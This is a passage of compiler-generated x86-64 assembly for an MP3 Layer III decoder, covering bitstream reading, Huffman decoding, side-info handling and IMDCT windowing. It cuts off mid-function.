mov rax, QWORD PTR fp[rip] test rax, rax je .L152 mov rax, QWORD PTR fp[rip] mov rdi, rax call fclose@PLT .L152: mov QWORD PTR fp[rip], 0 nop pop rbp .cfi_def_cfa 7, 8 ret .cfi_endproc .LFE19: .size Close_File, .-Close_File .type Get_Main_Bit, @function Get_Main_Bit: .LFB20: .cfi_startproc endbr64 push rbp .cfi_def_cfa_offset 16 .cfi_offset 6, -16 mov rbp, rsp .cfi_def_cfa_register 6 mov rax, QWORD PTR g_main_data_ptr[rip] mov edx, DWORD PTR [rax] mov ecx, DWORD PTR g_main_data_idx[rip] mov eax, 7 sub eax, ecx mov ecx, eax shr edx, cl mov eax, edx mov DWORD PTR -4[rbp], eax and DWORD PTR -4[rbp], 1 mov rdx, QWORD PTR g_main_data_ptr[rip] mov eax, DWORD PTR g_main_data_idx[rip] add eax, 1 shr eax, 3 mov eax, eax sal rax, 2 add rax, rdx mov QWORD PTR g_main_data_ptr[rip], rax mov eax, DWORD PTR g_main_data_idx[rip] add eax, 1 and eax, 7 mov DWORD PTR g_main_data_idx[rip], eax mov eax, DWORD PTR -4[rbp] pop rbp .cfi_def_cfa 7, 8 ret .cfi_endproc .LFE20: .size Get_Main_Bit, .-Get_Main_Bit .type Get_Main_Bits, @function Get_Main_Bits: .LFB21: .cfi_startproc endbr64 push rbp .cfi_def_cfa_offset 16 .cfi_offset 6, -16 mov rbp, rsp .cfi_def_cfa_register 6 mov DWORD PTR -20[rbp], edi cmp DWORD PTR -20[rbp], 0 jne .L156 mov eax, 0 jmp .L157 .L156: mov rax, QWORD PTR g_main_data_ptr[rip] mov eax, DWORD PTR [rax] sal eax, 24 mov edx, eax mov rax, QWORD PTR g_main_data_ptr[rip] add rax, 4 mov eax, DWORD PTR [rax] sal eax, 16 or edx, eax mov rax, QWORD PTR g_main_data_ptr[rip] add rax, 8 mov eax, DWORD PTR [rax] sal eax, 8 or edx, eax mov rax, QWORD PTR g_main_data_ptr[rip] add rax, 12 mov eax, DWORD PTR [rax] or eax, edx mov DWORD PTR -4[rbp], eax mov eax, DWORD PTR g_main_data_idx[rip] mov ecx, eax sal DWORD PTR -4[rbp], cl mov eax, 32 sub eax, DWORD PTR -20[rbp] mov ecx, eax shr DWORD PTR -4[rbp], cl mov rdx, QWORD PTR g_main_data_ptr[rip] mov ecx, DWORD PTR g_main_data_idx[rip] mov eax, DWORD PTR -20[rbp] add eax, ecx shr eax, 3 mov eax, eax sal rax, 2 add rax, rdx mov QWORD PTR g_main_data_ptr[rip], rax mov edx, DWORD PTR g_main_data_idx[rip] mov eax, DWORD PTR -20[rbp] add eax, edx and eax, 7 mov DWORD PTR g_main_data_idx[rip], eax mov eax, DWORD PTR -4[rbp] .L157: pop rbp .cfi_def_cfa 7, 8 ret .cfi_endproc .LFE21: .size Get_Main_Bits, .-Get_Main_Bits .type Get_Main_Pos, @function Get_Main_Pos: .LFB22: .cfi_startproc endbr64 push rbp .cfi_def_cfa_offset 16 .cfi_offset 6, -16 mov rbp, rsp .cfi_def_cfa_register 6 mov rax, QWORD PTR g_main_data_ptr[rip] lea rdx, g_main_data_vec[rip] sub rax, rdx mov DWORD PTR -4[rbp], eax mov eax, DWORD PTR -4[rbp] shr eax, 2 mov DWORD PTR -4[rbp], eax sal DWORD PTR -4[rbp], 3 mov eax, DWORD PTR g_main_data_idx[rip] add DWORD PTR -4[rbp], eax mov eax, DWORD PTR -4[rbp] pop rbp .cfi_def_cfa 7, 8 ret .cfi_endproc .LFE22: .size Get_Main_Pos, .-Get_Main_Pos .type Get_Side_Bits, @function Get_Side_Bits: .LFB23: .cfi_startproc endbr64 push rbp .cfi_def_cfa_offset 16 .cfi_offset 6, -16 mov rbp, rsp .cfi_def_cfa_register 6 mov DWORD PTR -20[rbp], edi mov rax, QWORD PTR side_info_ptr[rip] mov eax, DWORD PTR [rax] sal eax, 24 mov edx, eax mov rax, QWORD PTR side_info_ptr[rip] add rax, 4 mov eax, DWORD PTR [rax] sal eax, 16 or edx, eax mov rax, QWORD PTR side_info_ptr[rip] add rax, 8 mov eax, DWORD PTR [rax] sal eax, 8 or edx, eax mov rax, QWORD PTR side_info_ptr[rip] add rax, 12 mov eax, DWORD PTR [rax] or eax, edx mov DWORD PTR -4[rbp], eax mov eax, DWORD PTR side_info_idx[rip] mov ecx, eax sal DWORD PTR -4[rbp], cl mov eax, 32 sub eax, DWORD PTR -20[rbp] mov ecx, eax shr DWORD PTR -4[rbp], cl mov rdx, QWORD PTR side_info_ptr[rip] mov ecx, DWORD PTR side_info_idx[rip] mov eax, DWORD PTR -20[rbp] add eax, ecx shr eax, 3 mov eax, eax sal rax, 2 add rax, rdx mov QWORD PTR side_info_ptr[rip], rax mov edx, DWORD PTR side_info_idx[rip] mov eax, DWORD PTR -20[rbp] add eax, edx and eax, 7 mov DWORD PTR side_info_idx[rip], eax mov eax, DWORD PTR -4[rbp] pop rbp .cfi_def_cfa 7, 8 ret .cfi_endproc .LFE23: .size Get_Side_Bits, .-Get_Side_Bits .type Error, @function Error: .LFB24: .cfi_startproc endbr64 push rbp .cfi_def_cfa_offset 16 .cfi_offset 6, -16 mov rbp, rsp .cfi_def_cfa_register 6 push rbx sub rsp, 24 .cfi_offset 3, -24 mov QWORD PTR -24[rbp], rdi mov DWORD PTR -28[rbp], esi mov rbx, QWORD PTR stderr[rip] mov rax, QWORD PTR -24[rbp] mov rdi, rax call strlen@PLT mov rdx, rax mov rax, QWORD PTR -24[rbp] mov rcx, rbx mov esi, 1 mov rdi, rax call fwrite@PLT mov eax, DWORD PTR -28[rbp] mov edi, eax call exit@PLT .cfi_endproc .LFE24: .size Error, .-Error .section .rodata .align 8 .LC14: .string "\nCouldn't read sideinfo %d bytes at pos %d\n" .text .type Get_Sideinfo, @function Get_Sideinfo: .LFB25: .cfi_startproc endbr64 push rbp .cfi_def_cfa_offset 16 .cfi_offset 6, -16 mov rbp, rsp .cfi_def_cfa_register 6 sub rsp, 16 mov DWORD PTR -4[rbp], edi mov eax, DWORD PTR -4[rbp] lea rsi, side_info_vec[rip] mov edi, eax call Get_Bytes test eax, eax je .L164 call Get_Filepos mov ecx, eax mov rax, QWORD PTR stderr[rip] mov edx, DWORD PTR -4[rbp] lea rsi, .LC14[rip] mov rdi, rax mov eax, 0 call fprintf@PLT mov rax, QWORD PTR stderr[rip] mov rsi, rax mov edi, 10 call fputc@PLT jmp .L163 .L164: lea rax, side_info_vec[rip] mov QWORD PTR side_info_ptr[rip], rax mov DWORD PTR side_info_idx[rip], 0 .L163: leave .cfi_def_cfa 7, 8 ret .cfi_endproc .LFE25: .size Get_Sideinfo, .-Get_Sideinfo .section .rodata .align 8 .LC15: .string "Illegal Huff code in data. bleft = %d,point = %d. tab = %d." .text .type Huffman_Decode, @function Huffman_Decode: .LFB26: .cfi_startproc endbr64 push rbp .cfi_def_cfa_offset 16 .cfi_offset 6, -16 mov rbp, rsp .cfi_def_cfa_register 6 sub rsp, 80 mov DWORD PTR -36[rbp], edi mov QWORD PTR -48[rbp], rsi mov QWORD PTR -56[rbp], rdx mov QWORD PTR -64[rbp], rcx mov QWORD PTR -72[rbp], r8 mov DWORD PTR -28[rbp], 0 mov DWORD PTR -24[rbp], 1 mov DWORD PTR -20[rbp], 32 mov eax, DWORD PTR -36[rbp] sal rax, 4 mov rdx, rax lea rax, g_huffman_main[rip+8] movzx eax, WORD PTR [rdx+rax] movzx eax, ax mov DWORD PTR -16[rbp], eax mov eax, DWORD PTR -36[rbp] sal rax, 4 mov rdx, rax lea rax, g_huffman_main[rip+10] movzx eax, BYTE PTR [rdx+rax] movzx eax, al mov DWORD PTR -12[rbp], eax mov eax, DWORD PTR -36[rbp] sal rax, 4 mov rdx, rax lea rax, g_huffman_main[rip+8] movzx eax, WORD PTR [rdx+rax] movzx eax, ax mov DWORD PTR -16[rbp], eax cmp DWORD PTR -16[rbp], 0 jne .L167 mov rax, QWORD PTR -72[rbp] mov DWORD PTR [rax], 0 mov rax, QWORD PTR -72[rbp] mov edx, DWORD PTR [rax] mov rax, QWORD PTR -64[rbp] mov DWORD PTR [rax], edx mov rax, QWORD PTR -64[rbp] mov edx, DWORD PTR [rax] mov rax, QWORD PTR -56[rbp] mov DWORD PTR [rax], edx mov rax, QWORD PTR -56[rbp] mov edx, DWORD PTR [rax] mov rax, QWORD PTR -48[rbp] mov DWORD PTR [rax], edx mov eax, 0 jmp .L168 .L167: mov eax, DWORD PTR -36[rbp] sal rax, 4 mov rdx, rax lea rax, g_huffman_main[rip] mov rax, QWORD PTR [rdx+rax] mov QWORD PTR -8[rbp], rax .L177: mov eax, DWORD PTR -28[rbp] lea rdx, [rax+rax] mov rax, QWORD PTR -8[rbp] add rax, rdx movzx eax, WORD PTR [rax] movzx eax, ax and eax, 65280 test eax, eax jne .L169 mov DWORD PTR -24[rbp], 0 mov eax, DWORD PTR -28[rbp] lea rdx, [rax+rax] mov rax, QWORD PTR -8[rbp] add rax, rdx movzx eax, WORD PTR [rax] shr ax, 4 movzx eax, ax and eax, 15 mov edx, eax mov rax, QWORD PTR -48[rbp] mov DWORD PTR [rax], edx mov eax, DWORD PTR -28[rbp] lea rdx, [rax+rax] mov rax, QWORD PTR -8[rbp] add rax, rdx movzx eax, WORD PTR [rax] movzx eax, ax and eax, 15 mov edx, eax mov rax, QWORD PTR -56[rbp] mov DWORD PTR [rax], edx jmp .L170 .L169: call Get_Main_Bit test eax, eax je .L175 jmp .L172 .L173: mov eax, DWORD PTR -28[rbp] lea rdx, [rax+rax] mov rax, QWORD PTR -8[rbp] add rax, rdx movzx eax, WORD PTR [rax] movzx eax, ax movzx eax, al add DWORD PTR -28[rbp], eax .L172: mov eax, DWORD PTR -28[rbp] lea rdx, [rax+rax] mov rax, QWORD PTR -8[rbp] add rax, rdx movzx eax, WORD PTR [rax] movzx eax, ax movzx eax, al cmp eax, 249 jg .L173 mov eax, DWORD PTR -28[rbp] lea rdx, [rax+rax] mov rax, QWORD PTR -8[rbp] add rax, rdx movzx eax, WORD PTR [rax] movzx eax, ax movzx eax, al add DWORD PTR -28[rbp], eax jmp .L174 .L176: mov eax, DWORD PTR -28[rbp] lea rdx, [rax+rax] mov rax, QWORD PTR -8[rbp] add rax, rdx movzx eax, WORD PTR [rax] shr ax, 8 movzx eax, ax add DWORD PTR -28[rbp], eax .L175: mov eax, DWORD PTR -28[rbp] lea rdx, [rax+rax] mov rax, QWORD PTR -8[rbp] add rax, rdx movzx eax, WORD PTR [rax] shr ax, 8 cmp ax, 249 ja .L176 mov eax, DWORD PTR -28[rbp] lea rdx, [rax+rax] mov rax, QWORD PTR -8[rbp] add rax, rdx movzx eax, WORD PTR [rax] shr ax, 8 movzx eax, ax add DWORD PTR -28[rbp], eax .L174: sub DWORD PTR -20[rbp], 1 cmp DWORD PTR -20[rbp], 0 je .L170 mov eax, DWORD PTR -28[rbp] cmp eax, DWORD PTR -16[rbp] jb .L177 .L170: cmp DWORD PTR -24[rbp], 0 je .L178 mov rax, QWORD PTR stderr[rip] mov esi, DWORD PTR -36[rbp] mov ecx, DWORD PTR -28[rbp] mov edx, DWORD PTR -20[rbp] mov r8d, esi lea rsi, .LC15[rip] mov rdi, rax mov eax, 0 call fprintf@PLT mov rax, QWORD PTR stderr[rip] mov rsi, rax mov edi, 10 call fputc@PLT mov rax, QWORD PTR -56[rbp] mov DWORD PTR [rax], 0 mov rax, QWORD PTR -56[rbp] mov edx, DWORD PTR [rax] mov rax, QWORD PTR -48[rbp] mov DWORD PTR [rax], edx .L178: cmp DWORD PTR -36[rbp], 31 jbe .L179 mov rax, QWORD PTR -56[rbp] mov eax, DWORD PTR [rax] sar eax, 3 and eax, 1 mov edx, eax mov rax, QWORD PTR -64[rbp] mov DWORD PTR [rax], edx mov rax, QWORD PTR -56[rbp] mov eax, DWORD PTR [rax] sar eax, 2 and eax, 1 mov edx, eax mov rax, QWORD PTR -72[rbp] mov DWORD PTR [rax], edx mov rax, QWORD PTR -56[rbp] mov eax, DWORD PTR [rax] sar eax and eax, 1 mov edx, eax mov rax, QWORD PTR -48[rbp] mov DWORD PTR [rax], edx mov rax, QWORD PTR -56[rbp] mov eax, DWORD PTR [rax] and eax, 1 mov edx, eax mov rax, QWORD PTR -56[rbp] mov DWORD PTR [rax], edx mov rax, QWORD PTR -64[rbp] mov eax, DWORD PTR [rax] test eax, eax jle .L180 call Get_Main_Bit cmp eax, 1 jne .L180 mov rax, QWORD PTR -64[rbp] mov eax, DWORD PTR [rax] neg eax mov edx, eax mov rax, QWORD PTR -64[rbp] mov DWORD PTR [rax], edx .L180: mov rax, QWORD PTR -72[rbp] mov eax, DWORD PTR [rax] test eax, eax jle .L181 call Get_Main_Bit cmp eax, 1 jne .L181 mov rax, QWORD PTR -72[rbp] mov eax, DWORD PTR [rax] neg eax mov edx, eax mov rax, QWORD PTR -72[rbp] mov DWORD PTR [rax], edx .L181: mov rax, QWORD PTR -48[rbp] mov eax, DWORD PTR [rax] test eax, eax jle .L182 call Get_Main_Bit cmp eax, 1 jne .L182 mov rax, QWORD PTR -48[rbp] mov eax, DWORD PTR [rax] neg eax mov edx, eax mov rax, QWORD PTR -48[rbp] mov DWORD PTR [rax], edx .L182: mov rax, QWORD PTR -56[rbp] mov eax, DWORD PTR [rax] test eax, eax jle .L183 call Get_Main_Bit cmp eax, 1 jne .L183 mov rax, QWORD PTR -56[rbp] mov eax, DWORD PTR [rax] neg eax mov edx, eax mov rax, QWORD PTR -56[rbp] mov DWORD PTR [rax], edx jmp .L183 .L179: cmp DWORD PTR -12[rbp], 0 je .L184 mov rax, QWORD PTR -48[rbp] mov eax, DWORD PTR [rax] cmp eax, 15 jne .L184 mov eax, DWORD PTR -12[rbp] mov edi, eax call Get_Main_Bits mov edx, eax mov rax, QWORD PTR -48[rbp] mov eax, DWORD PTR [rax] add eax, edx mov edx, eax mov rax, QWORD PTR -48[rbp] mov DWORD PTR [rax], edx .L184: mov rax, QWORD PTR -48[rbp] mov eax, DWORD PTR [rax] test eax, eax jle .L185 call Get_Main_Bit cmp eax, 1 jne .L185 mov rax, QWORD PTR -48[rbp] mov eax, DWORD PTR [rax] neg eax mov edx, eax mov rax, QWORD PTR -48[rbp] mov DWORD PTR [rax], edx .L185: cmp DWORD PTR -12[rbp], 0 je .L186 mov rax, QWORD PTR -56[rbp] mov eax, DWORD PTR [rax] cmp eax, 15 jne .L186 mov eax, DWORD PTR -12[rbp] mov edi, eax call Get_Main_Bits mov edx, eax mov rax, QWORD PTR -56[rbp] mov eax, DWORD PTR [rax] add eax, edx mov edx, eax mov rax, QWORD PTR -56[rbp] mov DWORD PTR [rax], edx .L186: mov rax, QWORD PTR -56[rbp] mov eax, DWORD PTR [rax] test eax, eax jle .L183 call Get_Main_Bit cmp eax, 1 jne .L183 mov rax, QWORD PTR -56[rbp] mov eax, DWORD PTR [rax] neg eax mov edx, eax mov rax, QWORD PTR -56[rbp] mov DWORD PTR [rax], edx .L183: cmp DWORD PTR -24[rbp], 0 je .L187 mov eax, -1 jmp .L168 .L187: mov eax, 0 .L168: leave .cfi_def_cfa 7, 8 ret .cfi_endproc .LFE26: .size Huffman_Decode, .-Huffman_Decode .type Set_Filepos, @function Set_Filepos: .LFB27: .cfi_startproc endbr64 push rbp .cfi_def_cfa_offset 16 .cfi_offset 6, -16 mov rbp, rsp .cfi_def_cfa_register 6 sub rsp, 16 mov DWORD PTR -4[rbp], edi mov rax, QWORD PTR fp[rip] test rax, rax je .L192 mov ecx, DWORD PTR -4[rbp] mov rax, QWORD PTR fp[rip] mov edx, 0 mov rsi, rcx mov rdi, rax call fseek@PLT jmp .L189 .L192: nop .L189: leave .cfi_def_cfa 7, 8 ret .cfi_endproc .LFE27: .size Set_Filepos, .-Set_Filepos .type Decode_L3_Init_Song, @function Decode_L3_Init_Song: .LFB28: .cfi_startproc endbr64 push rbp .cfi_def_cfa_offset 16 .cfi_offset 6, -16 mov rbp, rsp .cfi_def_cfa_register 6 mov DWORD PTR synth_init[rip], 1 mov eax, DWORD PTR synth_init[rip] mov DWORD PTR hsynth_init[rip], eax mov DWORD PTR g_main_data_top[rip], 0 nop pop rbp .cfi_def_cfa 7, 8 ret .cfi_endproc .LFE28: .size Decode_L3_Init_Song, .-Decode_L3_Init_Song .type IMDCT_Win, @function IMDCT_Win: .LFB29: .cfi_startproc endbr64 push rbp .cfi_def_cfa_offset 16 .cfi_offset 6, -16 mov rbp, rsp .cfi_def_cfa_register 6 sub rsp, 160 mov QWORD PTR -120[rbp], rdi mov QWORD PTR -128[rbp], rsi mov DWORD PTR -132[rbp], edx mov rax, QWORD PTR fs:40 mov QWORD PTR -8[rbp], rax xor eax, eax mov eax, DWORD PTR init.11[rip] test eax, eax je .L195 mov DWORD PTR -100[rbp], 0 jmp .L196 .L199: mov eax, DWORD PTR -100[rbp] test rax, rax js .L197 pxor xmm0, xmm0 cvtsi2sd xmm0, rax jmp .L198 .L197: mov rdx, rax shr rdx and eax, 1 or rdx, rax pxor xmm0, xmm0 cvtsi2sd xmm0, rdx addsd xmm0, xmm0 .L198: movsd xmm1, QWORD PTR .LC16[rip] addsd xmm1, xmm0 movsd xmm0, QWORD PTR .LC17[rip] mulsd xmm1, xmm0 movq rax, xmm1 movq xmm0, rax call sin@PLT cvtsd2ss xmm0, xmm0 mov eax, DWORD PTR -100[rbp] lea rdx, 0[0+rax*4] lea rax, g_imdct_win.10[rip] movss DWORD PTR [rdx+rax], xmm0 add DWORD PTR -100[rbp], 1 .L196: cmp DWORD PTR -100[rbp], 35 jbe .L199 mov DWORD PTR -100[rbp], 0 jmp .L200 .L203: mov eax, DWORD PTR -100[rbp] test rax, rax js .L201 pxor xmm0, xmm0 cvtsi2sd xmm0, rax jmp .L202 .L201: mov rdx, rax shr rdx and eax, 1 or rdx, rax pxor xmm0, xmm0 cvtsi2sd xmm0, rdx addsd xmm0, xmm0 .L202: movsd xmm1, QWORD PTR .LC16[rip] addsd xmm1, xmm0 movsd xmm0, QWORD PTR .LC17[rip] mulsd xmm1, xmm0 movq rax, xmm1 movq xmm0, rax call sin@PLT cvtsd2ss xmm0, xmm0 mov eax, DWORD PTR -100[rbp] add rax, 36 lea rdx, 0[0+rax*4] lea rax, g_imdct_win.10[rip] movss DWORD PTR [rdx+rax], xmm0 add DWORD PTR -100[rbp], 1 .L200: cmp DWORD PTR -100[rbp], 17 jbe .L203 mov DWORD PTR -100[rbp], 18 jmp .L204 .L205: mov eax, DWORD PTR -100[rbp] add rax, 36 lea rdx, 0[0+rax*4] lea rax, g_imdct_win.10[rip] movss xmm0, DWORD PTR .LC18[rip] movss DWORD PTR [rdx+rax], xmm0 add DWORD PTR -100[rbp], 1 .L204: cmp DWORD PTR -100[rbp], 23 jbe .L205 mov DWORD PTR -100[rbp], 24 jmp .L206 .L209: mov eax, DWORD PTR -100[rbp] test rax, rax js .L207 pxor xmm0, xmm0 cvtsi2sd xmm0, rax jmp .L208 .L207: mov rdx, rax shr rdx and eax, 1 or rdx, rax pxor xmm0, xmm0 cvtsi2sd xmm0, rdx addsd xmm0, xmm0 .L208: movsd xmm1, QWORD PTR .LC16[rip] addsd xmm0, xmm1 movsd xmm2, QWORD PTR .LC19[rip] movapd xmm1, xmm0 subsd xmm1, xmm2 movsd xmm0, QWORD PTR .LC20[rip] mulsd xmm1, xmm0 movq rax, xmm1 movq xmm0, rax call sin@PLT cvtsd2ss xmm0, xmm0 mov eax, DWORD PTR -100[rbp] add rax, 36 lea rdx, 0[0+rax*4] lea rax, g_imdct_win.10[rip] movss DWORD PTR [rdx+rax], xmm0 add DWORD PTR -100[rbp], 1 .L206: cmp DWORD PTR -100[rbp], 29 jbe .L209 mov DWORD PTR -100[rbp], 30 jmp .L210 .L211: mov eax, DWORD PTR -100[rbp] add rax, 36 lea rdx, 0[0+rax*4] lea rax, g_imdct_win.10[rip] pxor xmm0, xmm0 movss DWORD PTR [rdx+rax], xmm0 add DWORD PTR -100[rbp], 1 .L210: cmp DWORD PTR -100[rbp], 35 jbe .L211 mov DWORD PTR -100[rbp], 0 jmp .L212 .L215: mov eax, DWORD PTR -100[rbp] test rax, rax js .L213 pxor xmm0, xmm0 cvtsi2sd xmm0, rax jmp .L214 .L213: mov rdx, rax shr rdx and eax, 1 or rdx, rax pxor xmm0, xmm0 cvtsi2sd xmm0, rdx addsd xmm0, xmm0 .L214: movsd xmm1, QWORD PTR .LC16[rip] addsd xmm1, xmm0 movsd xmm0, QWORD PTR .LC20[rip] mulsd xmm1, xmm0 movq rax, xmm1 movq xmm0, rax call sin@PLT cvtsd2ss xmm0, xmm0 mov eax, DWORD PTR -100[rbp] add rax, 72 lea rdx, 0[0+rax*4] lea rax, g_imdct_win.10[rip] movss DWORD PTR [rdx+rax], xmm0 add DWORD PTR -100[rbp], 1 .L212: cmp DWORD PTR -100[rbp], 11 jbe .L215 mov DWORD PTR -100[rbp], 12 jmp .L216 .L217: mov eax, DWORD PTR -100[rbp] add rax, 72 lea rdx, 0[0+rax*4] lea rax, g_imdct_win.10[rip] pxor xmm0, xmm0 movss DWORD PTR [rdx+rax], xmm0 add DWORD PTR -100[rbp], 1 .L216: cmp DWORD PTR -100[rbp], 35 jbe .L217 mov DWORD PTR -100[rbp], 0 jmp .L218 .L219: mov eax, DWORD PTR -100[rbp] add rax, 108 lea rdx, 0[0+rax*4] lea rax, g_imdct_win.10[rip] pxor xmm0, xmm0 movss DWORD PTR [rdx+rax], xmm0 add DWORD PTR -100[rbp], 1 .L218: cmp DWORD PTR -100[rbp], 5 jbe .L219 mov DWORD PTR -100[rbp], 6 jmp .L220 .L223: mov eax, DWORD PTR -100[rbp] test rax, rax js .L221 pxor xmm0, xmm0 cvtsi2sd xmm0, rax jmp .L222 .L221: mov rdx, rax shr rdx and eax, 1 or rdx, rax pxor xmm0, xmm0 cvtsi2sd xmm0, rdx addsd xmm0, xmm0 .L222: movsd xmm1, QWORD PTR .LC16[rip] addsd xmm0, xmm1 movsd xmm2, QWORD PTR .LC22[rip] movapd xmm1, xmm0 subsd xmm1, xmm2 movsd xmm0, QWORD PTR .LC20[rip] mulsd xmm1, xmm0 movq rax, xmm1 movq xmm0, rax call sin@PLT cvtsd2ss xmm0, xmm0 mov eax, DWORD PTR -100[rbp] add rax, 108 lea rdx, 0[0+rax*4] lea rax, g_imdct_win.10[rip] movss DWORD PTR [rdx+rax], xmm0 add DWORD PTR -100[rbp], 1 .L220: cmp DWORD PTR -100[rbp], 11 jbe .L223 mov DWORD PTR -100[rbp], 12 jmp .L224 .L225: mov eax, DWORD PTR -100[rbp] add rax, 108 lea rdx, 0[0+rax*4] lea rax, g_imdct_win.10[rip] movss xmm0, DWORD PTR .LC18[rip] movss DWORD PTR [rdx+rax], xmm0 add DWORD PTR -100[rbp], 1 .L224: cmp DWORD PTR -100[rbp], 17 jbe .L225 mov DWORD PTR -100[rbp], 18 jmp .L226 .L229: mov eax, DWORD PTR -100[rbp] test rax, rax js .L227 pxor xmm0, xmm0 cvtsi2sd xmm0, rax jmp .L228 .L227: mov rdx, rax shr rdx and eax, 1 or rdx, rax pxor xmm0, xmm0 cvtsi2sd xmm0, rdx addsd xmm0, xmm0 .L228: movsd xmm1, QWORD PTR .LC16[rip] addsd xmm1, xmm0 movsd xmm0, QWORD PTR .LC17[rip] mulsd xmm1, xmm0 movq rax, xmm1 movq xmm0, rax call sin@PLT cvtsd2ss xmm0, xmm0 mov eax, DWORD PTR -100[rbp] add rax, 108 lea rdx, 0[0+rax*4] lea rax, g_imdct_win.10[rip] movss DWORD PTR [rdx+rax], xmm0 add DWORD PTR -100[rbp], 1 .L226: cmp DWORD PTR -100[rbp], 35 jbe .L229 mov DWORD PTR init.11[rip], 0 .L195: mov DWORD PTR -100[rbp], 0 jmp .L230 .L231: mov eax, DWORD PTR -100[rbp] lea rdx, 0[0+rax*4] mov rax, QWORD PTR -128[rbp] add rax, rdx pxor xmm0, xmm0 movss DWORD PTR [rax], xmm0 add DWORD PTR -100[rbp], 1 .L230: cmp DWORD PTR -100[rbp], 35 jbe .L231 mov DWORD PTR -100[rbp], 0 jmp .L232 .L233: mov eax, DWORD PTR -100[rbp] lea rdx, 0[0+rax*4] mov rax, QWORD PTR -120[rbp] add rax, rdx movss xmm0, DWORD PTR [rax] mov eax, DWORD PTR -100[rbp] movss DWORD PTR -80[rbp+rax*4], xmm0 add DWORD PTR -100[rbp], 1 .L232: cmp DWORD PTR -100[rbp], 17 jbe .L233 cmp DWORD PTR -132[rbp], 2 jne .L234 mov DWORD PTR -84[rbp], 12 mov DWORD PTR -100[rbp], 0 jmp .L235 .L246: mov DWORD PTR -92[rbp], 0 jmp .L236 .L245: pxor xmm0, xmm0 movss DWORD PTR -88[rbp], xmm0 mov DWORD PTR -96[rbp], 0 jmp .L237 .L244: pxor xmm3, xmm3 cvtss2sd xmm3, DWORD PTR -88[rbp] movsd QWORD PTR -144[rbp], xmm3 mov edx, DWORD PTR -96[rbp] mov eax, edx add eax, eax add edx, eax mov eax, DWORD PTR -100[rbp] add eax, edx mov eax, eax movss xmm0, DWORD PTR -80[rbp+rax*4] pxor xmm4, xmm4 cvtss2sd xmm4, xmm0 movsd QWORD PTR -152[rbp], xmm4 mov eax, DWORD PTR -84[rbp] add eax, eax mov eax, eax test rax, rax js .L238 pxor xmm0, xmm0 cvtsi2sd xmm0, rax jmp .L239 .L238: mov rdx, rax shr rdx and eax, 1 or rdx, rax pxor xmm0, xmm0 cvtsi2sd xmm0, rdx addsd xmm0, xmm0 .L239: movsd xmm1, QWORD PTR .LC23[rip] divsd xmm1, xmm0 mov eax, DWORD PTR -92[rbp] lea edx, [rax+rax] mov eax, DWORD PTR -84[rbp] shr eax add eax, edx add eax, 1 mov eax, eax test rax, rax js .L240 pxor xmm0, xmm0 cvtsi2sd xmm0, rax jmp .L241 .L240: mov rdx, rax shr rdx and eax, 1 or rdx, rax pxor xmm0, xmm0 cvtsi2sd xmm0, rdx addsd xmm0, xmm0 .L241: mulsd xmm1, xmm0 mov eax, DWORD PTR -96[rbp] add eax, eax add eax, 1 mov eax, eax test rax, rax js .L242 pxor xmm0, xmm0 cvtsi2sd xmm0, rax jmp .L243 .L242: mov rdx, rax shr rdx and eax, 1 or rdx, rax pxor xmm0, xmm0 cvtsi2sd xmm0, rdx addsd xmm0, xmm0 .L243: mulsd xmm1, xmm0 movq rax, xmm1 movq xmm0, rax call cos@PLT mulsd xmm0, QWORD PTR -152[rbp] addsd xmm0, QWORD PTR -144[rbp] cvtsd2ss xmm0, xmm0 movss DWORD PTR -88[rbp], xmm0 add DWORD PTR -96[rbp], 1 .L237: mov eax, DWORD PTR -84[rbp] shr eax cmp DWORD PTR -96[rbp], eax jb .L244 mov edx, DWORD PTR -100[rbp] mov eax, edx add eax, eax add eax, edx add eax, eax mov edx, eax mov eax, DWORD PTR -92[rbp] add eax, edx add eax, 6 mov eax, eax lea rdx, 0[0+rax*4] mov rax, QWORD PTR -128[rbp] add rax, rdx movss xmm1, DWORD PTR [rax] mov ecx, DWORD PTR -92[rbp] mov edx, DWORD PTR -132[rbp] mov rax, rdx sal rax, 3 add rax, rdx sal rax, 2 add rax, rcx lea rdx, 0[0+rax*4] lea rax, g_imdct_win.10[rip] movss xmm0, DWORD PTR [rdx+rax] mulss xmm0, DWORD PTR -88[rbp] mov edx, DWORD PTR -100[rbp] mov eax, edx add eax, eax add eax, edx add eax, eax mov edx, eax mov eax, DWORD PTR -92[rbp] add eax, edx add eax, 6 mov eax, eax lea rdx, 0[0+rax*4] mov rax, QWORD PTR -128[rbp] add rax, rdx addss xmm0, xmm1 movss DWORD PTR [rax], xmm0 add DWORD PTR -92[rbp], 1 .L236: mov eax, DWORD PTR -92[rbp] cmp eax, DWORD PTR -84[rbp] jb .L245 add DWORD PTR -100[rbp], 1 .L235: cmp DWORD PTR -100[rbp], 2 jbe .L246 jmp .L259 .L234: mov DWORD PTR -84[rbp], 36 mov DWORD PTR -92[rbp], 0 jmp .L248 .L257: pxor xmm0, xmm0 movss DWORD PTR -88[rbp], xmm0 mov DWORD PTR -96[rbp], 0 jmp .L249 .L256: pxor xmm7, xmm7 cvtss2sd xmm7, DWORD PTR -88[rbp] movsd QWORD PTR -144[rbp], xmm7 mov eax, DWORD PTR -96[rbp] lea rdx, 0[0+rax*4] mov rax, QWORD PTR -120[rbp] add rax, rdx movss xmm0, DWORD PTR [rax] pxor xmm3, xmm3 cvtss2sd xmm3, xmm0 movsd QWORD PTR -152[rbp], xmm3 mov eax, DWORD PTR -84[rbp] add eax, eax mov eax, eax test rax, rax js .L250 pxor xmm0, xmm0 cvtsi2sd xmm0, rax jmp .L251 .L250: mov rdx, rax shr rdx and eax, 1 or rdx, rax pxor xmm0, xmm0 cvtsi2sd xmm0, rdx addsd xmm0, xmm0 .L251: movsd xmm1, QWORD PTR .LC23[rip] divsd xmm1, xmm0 mov eax, DWORD PTR -92[rbp] lea edx, [rax+rax] mov eax, DWORD PTR -84[rbp] shr eax add eax, edx add eax, 1 mov eax, eax test rax, rax js .L252 pxor xmm0, xmm0 cvtsi2sd xmm0, rax jmp .L253 .L252: mov rdx, rax shr rdx and eax, 1 or rdx, rax pxor xmm0, xmm0 cvtsi2sd xmm0, rdx addsd xmm0, xmm0 .L253: mulsd xmm1, xmm0 mov eax, DWORD PTR -96[rbp] add eax, eax add eax, 1 mov eax, eax test rax, rax js .L254 pxor xmm0, xmm0 cvtsi2sd xmm0, rax jmp .L255 .L254: mov rdx, rax shr rdx and eax, 1 or rdx, rax pxor xmm0, xmm0 cvtsi2sd xmm0, rdx addsd xmm0, xmm0 .L255: mulsd xmm1, xmm0 movq rax, xmm1 movq xmm0, rax call cos@PLT mulsd xmm0, QWORD PTR 